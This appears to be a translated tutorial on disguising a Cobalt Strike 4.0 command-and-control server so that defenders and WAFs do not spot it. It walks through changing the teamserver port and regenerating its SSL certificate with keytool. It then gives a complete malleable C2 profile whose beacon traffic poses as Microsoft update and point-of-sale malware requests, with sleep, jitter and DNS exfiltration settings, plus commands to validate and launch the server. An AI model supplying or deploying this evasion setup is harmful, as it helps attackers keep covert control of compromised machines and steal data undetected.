catalogue
Create and modify C2 profile file:
4, Run the teamserver file server and go online
Introduction:
Many tools have their own characteristics, such as sqlmap, awvs and other scanners, which can be easily removed by waf ban when scanning; Or because they didn't hide their own characteristics, they were online.
Here, we mainly hide our own characteristics from three aspects: modifying the default port, replacing the SSL certificate and modifying the C2.profile file.
Here I use the version of cobalt strike 4.0
1, Modify default port
vim teamserver
On the last line of the file; The default port is 50050; It can be modified to any port according to the situation.
I changed it here to 10000
2, Replace SSL certificate
keytool is a Java data certificate and key management tool.
Keytool stores keys and certificates in a file called keystore, that is, the store suffix file.
#Command
- certreq Generate certificate request
- changealias Change the alias of an entry
- delete Delete entry
- exportcert Export certificate
- genkeypair Generate key pair
- genseckey Generate key
- gencert Generate certificate based on certificate request
- importcert Import certificate or certificate chain
- importpass Import password
- importkeystore Import one or all entries from another keystore
- keypasswd Change key password for entry
- list List entries in the keystore
- printcert Print certificate content
- printcertreq Print the contents of the certificate request
- printcrl Print the contents of the CRL file
- storepasswd Change the password stored in the keystore
View Certificate:
keytool -list -v -keystore cobaltstrike.store
The default password is 123456
You can see that the owner of the alias and certificate contains some characteristics of CS.
The default is:
CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth
Here is a modification; Generate a new certificate file from:
keytool -genkey -alias ling -keyalg RSA -validity 36500 -keystore ling.store
View Certificate:
keytool -list -v -keystore ling.store
Load certificate file:
keytool -importkeystore -srckeystore ./ling.store -destkeystore ./ling.store -deststoretype pkcs12
3, Modify C2.profile file
Create and modify C2 profile file:
vi c2.profile
#The file name is optional
set keystore set password set alias
set sample_name "C2 POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#Set certificate
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}#set up
code-signer{
set keystore "ling.store";
set password "159357";
set alias "ling";
}#Specify the IP address when DNS beacon is not used
set dns_idle "8.8.4.4";
#Force sleep time before each individual DNS request
set dns_sleep "0";
#Maximum length of host name when uploading data through DNS [0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
} }
server {
output {
print;
} } }
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
} }
server {
header "Content-Type" "text/plain";
output {
base64;
print;
} } }
c2lint checks whether the configuration file can pass
./c2lint c2.profile
If the operation fails, a red exception code will appear
4, Run the teamserver file server and go online
./teamserver 192.168.100.142 123123 ling.store
Successfully entered.